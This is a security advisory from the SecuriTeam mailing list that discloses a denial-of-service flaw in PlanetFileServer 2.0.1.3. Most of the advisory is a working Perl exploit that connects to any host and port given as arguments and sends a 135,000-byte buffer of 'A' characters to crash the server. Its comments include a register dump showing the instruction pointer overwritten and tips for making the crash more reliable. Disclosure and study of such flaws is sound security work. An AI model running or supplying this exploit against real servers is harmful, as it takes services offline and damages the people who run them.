[EXPL] PlanetFileServer DoS (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



PlanetFileServer DoS (Exploit)
------------------------------------------------------------------------


SUMMARY

<http://www.planetdns.net/> PlanetDNS provides "products and services
that enable you to host your own web server, e-mail server, FTP server and
more, using your own computer and your existing Internet connection".

PlanetFileServer has been found to be vulnerable to denial of service
vulnerability caused by the product's improper handling of malformed
requests.

DETAILS

Vulnerable Systems:
* PlanetFileServer version 2.0.1.3

Exploit:
#!/usr/bin/perl

# Vulnerability: Denial Of Service - Crash
# Discovered on: June 28, 2005
# Coded by: fRoGGz - SecuBox Labs
# Severity: Normal
# ----------- // Registers // -----------
# Dynamic Library Link of "NewAce Corporation" called "mshftp.dll" is the
real problem.
# varmodAddVariable() returned error code %d
# EAX 0163D940
# ECX 41414141
# EDX 784751B6
# EBX 0163FFDC
# ESP 0163D8A8
# EBP 0163D8C8
# ESI 0163D968
# EDI 00000400
# EIP 41414141
# ------------------------------------

use IO::Socket;
use strict;

if(!$ARGV[1]) {
die "Utilisation: perl -w pfsdos.pl \n";
}

my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],PeerPort =>
$ARGV[1],Proto => "TCP"))
{
print "\n\nPlanetDNS Software - PlanetFileServer v2.0.1.3\r\n";
print "Denial Of Service - Crash Vulnerability\r\n";
print "---------------------------------------------\r\n";
print "Discovered & coded by fRoGGz - SecuBox Labs\r\n\n";
print "[+] Connexion sur $ARGV[0]:$ARGV[1] ...\r\n";
print "[+] Envoi du buffer malicieux.";
# On our config the value "134891" is the min for DoS, but more is
better for a great successfull exploitation.
# Security Filter Option used 7 levels, so ....
# If you change levels to the max you must set the buffer size or use
this PoC 2 times, it works well.
print $socket "\x41" x 135000 . "\r\n";
close($socket);
}
else
{
print "[-] Impossible de se connecter sur $ARGV[0]:$ARGV[1]\n";
}


ADDITIONAL INFORMATION

The information has been provided by <mailto:unsecure@xxxxxxxxxxx>
unsecure.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages